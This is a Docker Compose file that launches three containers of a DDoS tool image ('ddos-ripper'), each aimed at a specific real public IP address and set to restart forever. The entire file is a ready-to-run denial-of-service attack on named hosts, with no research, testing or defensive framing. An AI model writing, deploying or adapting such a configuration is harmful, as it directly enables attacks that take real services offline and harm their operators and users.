version: '3'
services:
  ddos-runner-1:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: 193.104.87.251
  ddos-runner-2:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: 194.84.25.50
  ddos-runner-3:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: 193.104.87.248
